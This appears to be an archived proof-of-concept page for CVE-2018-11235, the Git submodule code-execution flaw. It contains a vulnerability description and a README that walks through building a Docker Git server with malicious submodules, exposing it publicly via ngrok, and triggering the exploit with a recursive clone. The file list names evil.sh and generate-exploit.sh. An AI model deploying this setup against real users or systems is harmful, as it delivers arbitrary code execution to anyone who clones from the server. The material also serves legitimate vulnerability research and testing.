Associated Vulnerability
Title:Git 安全漏洞 (CVE-2018-11235)Description:Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。 Git中存在安全漏洞,该漏洞源于在将子模块名称添加到$GIT_DIR/modules目录下时,程序没有正确的验证来自不可信.gitmodules文件的子模块名称。远程攻击者可借助特制的.gitmodules文件利用该漏洞执行任意代码。以下版本受到影响:Git 2.13.7之前版本,2.14.4之前的2.14.x版本,2.15.2之前的2.15.x版本,2.16.4之前的2.16.x版本,2.1
Description
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
Readme
# CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
CVE-2018-11235-Git PoC and tunneling with docker ngrok
### Build Dockerfile
```bash
$ docker build -t cve-2018-11235 .
```
### Create custom network for `ngrok`
```bash
$ docker network create myngroknet
```
### Start Git Http Server
```bash
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235
```
### Start Ngrok HTTP Server for Git Server
```bash
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN
```
### You can now access the API to find the assigned domain:
```bash
$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}
```
### PoC on Vulnerable Git Server
```bash
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git
```
### References:
- [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
- [CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [Expose Docker Container services on the Internet using the ngrok docker image](https://medium.com/oracledevs/expose-docker-container-services-on-the-internet-using-the-ngrok-docker-image-3f1ea0f9c47a)
- [wernight/ngrok](https://hub.docker.com/r/wernight/ngrok/)
- [CVE-2018-11235 - Quick & Dirty PoC](https://atorralba.github.io/CVE-2018-11235/)
File Snapshot
[4.0K] /data/pocs/0c35a80eedca18fb819fad5fa5e5e10d2c094188
├── [ 116] apache-settings.conf
├── [ 984] Dockerfile
├── [ 40] evil.sh
├── [ 901] generate-exploit.sh
└── [2.1K] README.md
0 directories, 5 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.